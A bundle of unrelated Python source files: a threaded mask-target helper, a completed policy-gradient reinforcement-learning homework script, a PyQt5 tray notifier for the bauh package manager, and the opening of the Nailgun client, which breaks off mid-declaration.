roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg, flipped)
threads = [threading.Thread(target=process, args=()) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
# Single thread
# for im_i in range(num_images):
# print "-----processing img {}".format(im_i)
# rois = roidb[im_i]['boxes']
# max_overlaps = roidb[im_i]['max_overlaps']
# max_classes = roidb[im_i]['max_classes']
# ins_seg = roidb[im_i]['ins_seg']
# # roidb[im_i]['mask_targets'] = compute_bbox_mask_targets(rois, max_overlaps, max_classes, ins_seg)
# roidb[im_i]['mask_targets'], roidb[im_i]['mask_labels'], roidb[im_i]['mask_inds'] = \
# compute_bbox_mask_targets_and_label(rois, max_overlaps, max_classes, ins_seg)
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
tf.logging.set_verbosity(tf.logging.ERROR)
#============================================================================================#
# Utilities
#============================================================================================#
def normalize(data, mean=0.0, std=1.0):
n_data = (data - np.mean(data)) / (np.std(data) + 1e-8)
return n_data * (std + 1e-8) + mean
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the ouput layers
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
# Build dense-net of variable depth
with tf.variable_scope(scope):
placeholder = input_placeholder
for h in range(n_layers):
placeholder = tf.layers.dense(placeholder, size, activation=activation)
placeholder = tf.layers.dense(placeholder, output_size, activation=output_activation)
return placeholder
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch batch observations / actions / advantages in policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
# Placeholder for advantage, shape is None so that it can be 1d of variable length
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
# YOUR_CODE_HERE
y_out = build_mlp(sy_ob_no, self.ac_dim, "scope", self.n_layers, self.size)
if self.discrete:
# Logits are direct output of network
sy_logits_na = y_out
return sy_logits_na
else:
# Mean is learned by dense-net, logstddev is learned alone
sy_mean = y_out
sy_logstd = tf.get_variable(initializer=tf.zeros_initializer, shape=[self.ac_dim], name='logstd')
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# tf.multinomial samples random values from a tensor
sy_sampled_ac = tf.multinomial(sy_logits_na, 1)
# flatten
sy_sampled_ac = tf.reshape(sy_sampled_ac, [-1])
else:
sy_mean, sy_logstd = policy_parameters
# According to function above
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean))
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
## softmax crossentropy gives log probability
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
# Likelihood of chosen action
sy_mean, sy_logstd = policy_parameters
# multivariate gaussian
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean,
scale_diag=tf.exp(sy_logstd))
# log prob of said gaussian
sy_logprob_n = dist.log_prob(sy_ac_na)
return sy_logprob_n
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch self.size /n/, observation dim)
_na - this tensor should have shape (batch self.size /n/, action dim)
_n - this tensor should have shape (batch self.size /n/)
Note: batch self.size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
# Gradient descent with logprob and advantage
loss = -tf.reduce_mean(tf.multiply(self.sy_logprob_n, self.sy_adv_n))
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
# Target is learnable parameter
self.sy_target_n = tf.placeholder(shape=[None], name="target_n", dtype=tf.float32)
# Regular l2 loss
baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
# Run action sampling
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no : [ob]})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
q_n = []
for path in re_n:
q = 0
q_path = []
# Dynamic programming over reversed path
for rew in reversed(path):
q = rew + self.gamma * q
q_path.append(q)
q_path.reverse()
if not self.reward_to_go:
q_path = [q_path[0]] * len(q_path)
q_n.extend(q_path)
return q_n
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
# predict baseline
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no : ob_no})
# normalize baseline as per comments above
b_n = normalize(b_n, np.mean(q_n), np.std(q_n))
# advantage is total rewards minus baseline
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = normalize(adv_n)
return q_n, adv_n
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
q_n = normalize(q_n)
_ = self.sess.run(self.baseline_update_op, feed_dict={
self.sy_ob_no : ob_no,
self.sy_target_n: q_n})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
_ = self.sess.run(self.update_op, feed_dict={
self.sy_ob_no: ob_no,
self.sy_ac_na: ac_na,
self.sy_adv_n: adv_n})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
env = gym.wrappers.Monitor(
env,
'records/' + env_name,
force=True,
video_callable=lambda episode_id: episode_id%1000==0)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
env.close()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# # Awkward hacky process runs, because Tensorflow does not like
# # repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you comment in the line below, then the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
systray.py
|
import time
from io import StringIO
from threading import Lock, Thread
from typing import List
from PyQt5.QtCore import QThread, pyqtSignal, QCoreApplication, Qt
from PyQt5.QtGui import QIcon
from PyQt5.QtWidgets import QSystemTrayIcon, QMenu
from bauh import __app_name__
from bauh.api.abstract.controller import SoftwareManager
from bauh.api.abstract.model import PackageUpdate
from bauh.view.util import util, resource
from bauh.view.qt.about import AboutDialog
from bauh.view.qt.window import ManageWindow
class UpdateCheck(QThread):
signal = pyqtSignal(list)
def __init__(self, manager: SoftwareManager, check_interval: int, parent=None):
super(UpdateCheck, self).__init__(parent)
self.check_interval = check_interval
self.manager = manager
def run(self):
while True:
updates = self.manager.list_updates()
self.signal.emit(updates)
time.sleep(self.check_interval)
class TrayIcon(QSystemTrayIcon):
def __init__(self, i18n: dict, manager: SoftwareManager, manage_window: ManageWindow, check_interval: int = 60, update_notification: bool = True):
super(TrayIcon, self).__init__()
self.i18n = i18n
self.manager = manager
self.icon_default = QIcon(resource.get_path('img/logo.png'))
self.icon_update = QIcon(resource.get_path('img/logo_update.png'))
self.setIcon(self.icon_default)
self.menu = QMenu()
self.action_manage = self.menu.addAction(self.i18n['tray.action.manage'])
self.action_manage.triggered.connect(self.show_manage_window)
self.action_about = self.menu.addAction(self.i18n['tray.action.about'])
self.action_about.triggered.connect(self.show_about)
self.action_exit = self.menu.addAction(self.i18n['tray.action.exit'])
self.action_exit.triggered.connect(lambda: QCoreApplication.exit())
self.setContextMenu(self.menu)
self.manage_window = None
self.dialog_about = None
self.check_thread = UpdateCheck(check_interval=check_interval, manager=self.manager)
self.check_thread.signal.connect(self.notify_updates)
self.check_thread.start()
self.last_updates = set()
self.update_notification = update_notification
self.lock_notify = Lock()
self.activated.connect(self.handle_click)
self.set_default_tooltip()
self.manage_window = manage_window
def set_default_tooltip(self):
self.setToolTip('{} ({})'.format(self.i18n['manage_window.title'], __app_name__).lower())
def handle_click(self, reason):
if reason == self.Trigger:
self.show_manage_window()
def verify_updates(self, notify_user: bool = True):
Thread(target=self._verify_updates, args=(notify_user,)).start()
def _verify_updates(self, notify_user: bool):
self.notify_updates(self.manager.list_updates(), notify_user=notify_user)
def notify_updates(self, updates: List[PackageUpdate], notify_user: bool = True):
self.lock_notify.acquire()
try:
if len(updates) > 0:
update_keys = {'{}:{}:{}'.format(up.type, up.id, up.version) for up in updates}
new_icon = self.icon_update
if update_keys.difference(self.last_updates):
self.last_updates = update_keys
n_updates = len(updates)
ups_by_type = {}
for key in update_keys:
ptype = key.split(':')[0]
count = ups_by_type.get(ptype)
count = 1 if count is None else count + 1
ups_by_type[ptype] = count
msg = StringIO()
msg.write(self.i18n['notification.update{}'.format('' if n_updates == 1 else 's')].format(n_updates))
if len(ups_by_type) > 1:
for ptype, count in ups_by_type.items():
msg.write('\n * {} ( {} )'.format(ptype.capitalize(), count))
msg.seek(0)
msg = msg.read()
self.setToolTip(msg)
if self.update_notification and notify_user:
util.notify_user(msg=msg)
else:
self.last_updates.clear()
new_icon = self.icon_default
self.set_default_tooltip()
if self.icon().cacheKey() != new_icon.cacheKey(): # changes the icon if needed
self.setIcon(new_icon)
finally:
self.lock_notify.release()
def show_manage_window(self):
if self.manage_window.isMinimized():
self.manage_window.setWindowState(Qt.WindowNoState)
elif not self.manage_window.isVisible():
self.manage_window.refresh_apps()
self.manage_window.show()
def show_about(self):
if self.dialog_about is None:
self.dialog_about = AboutDialog(self.i18n)
if self.dialog_about.isHidden():
self.dialog_about.show()
|
ng.py
|
#!/usr/bin/env python
#
# Copyright 2004-2015, Martian Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import ctypes
import platform
import optparse
import os
import time
import os.path
import tempfile
import select
import socket
import struct
import sys
from threading import Condition, Event, Thread, RLock
from subprocess import CalledProcessError, check_call
is_py2 = sys.version[0] == "2"
if is_py2:
import Queue as Queue
import __builtin__ as builtin
def to_bytes(s):
return s
else:
import queue as Queue
import builtins as builtin
from io import UnsupportedOperation
def to_bytes(s):
return bytes(s, "utf-8")
def bytes_to_str(bytes_to_convert):
"""Version independent way of converting bytes to string."""
return bytes_to_convert if is_py2 else bytes_to_convert.decode("utf-8")
# @author <a href="http://www.martiansoftware.com/contact.html">Marty Lamb</a>
# @author Pete Kirkham (Win32 port)
# @author Sergey Balabanov, Ben Hamilton (Python port)
#
# Please try to keep this working on Python 2.6.
NAILGUN_VERSION = "0.9.3"
BUFSIZE = 2048
NAILGUN_PORT_DEFAULT = 8212
CHUNK_HEADER_LEN = 5
THREAD_TERMINATION_TIMEOUT_SEC = 0.5
STDIN_BUFFER_LINE_SIZE = 10
CHUNKTYPE_STDIN = b"0"
CHUNKTYPE_STDOUT = b"1"
CHUNKTYPE_STDERR = b"2"
CHUNKTYPE_STDIN_EOF = b"."
CHUNKTYPE_ARG = b"A"
CHUNKTYPE_LONGARG = b"L"
CHUNKTYPE_ENV = b"E"
CHUNKTYPE_DIR = b"D"
CHUNKTYPE_CMD = b"C"
CHUNKTYPE_EXIT = b"X"
CHUNKTYPE_SENDINPUT = b"S"
CHUNKTYPE_HEARTBEAT = b"H"
NSEC_PER_SEC = 1000000000
DEFAULT_HEARTBEAT_INTERVAL_SEC = 0.5
SELECT_MAX_BLOCK_TIME_SEC = 1.0
SEND_THREAD_WAIT_TERMINATION_SEC = 5.0
# We need to support Python 2.6 hosts which lack memoryview().
HAS_MEMORYVIEW = "memoryview" in dir(builtin)
EVENT_STDIN_CHUNK = 0
EVENT_STDIN_CLOSED = 1
EVENT_STDIN_EXCEPTION = 2
class NailgunException(Exception):
SOCKET_FAILED = 231
CONNECT_FAILED = 230
UNEXPECTED_CHUNKTYPE = 229
CONNECTION_BROKEN = 227
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return self.message
class Transport(object):
def close(self):
raise NotImplementedError()
def sendall(self, data):
raise NotImplementedError()
def recv(self, size):
raise NotImplementedError()
def recv_into(self, buffer, size=None):
raise NotImplementedError()
def select(self, timeout_secs):
raise NotImplementedError()
class UnixTransport(Transport):
def __init__(self, __socket):
self.__socket = __socket
self.recv_flags = 0
self.send_flags = 0
if hasattr(socket, "MSG_WAITALL"):
self.recv_flags |= socket.MSG_WAITALL
if hasattr(socket, "MSG_NOSIGNAL"):
self.send_flags |= socket.MSG_NOSIGNAL
def close(self):
return self.__socket.close()
def sendall(self, data):
result = self.__socket.sendall(data, self.send_flags)
return result
def recv(self, nbytes):
return self.__socket.recv(nbytes, self.recv_flags)
def recv_into(self, buffer, nbytes=None):
return self.__socket.recv_into(buffer, nbytes, self.recv_flags)
def select(self, timeout_secs):
select_list = [self.__socket]
readable, _, exceptional = select.select(
select_list, [], select_list, timeout_secs
)
return (self.__socket in readable), (self.__socket in exceptional)
if os.name == "nt":
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
ERROR_PIPE_BUSY = 231
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR),
("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD),
("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE),
]
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [
wintypes.LPCWSTR,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.HANDLE,
]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
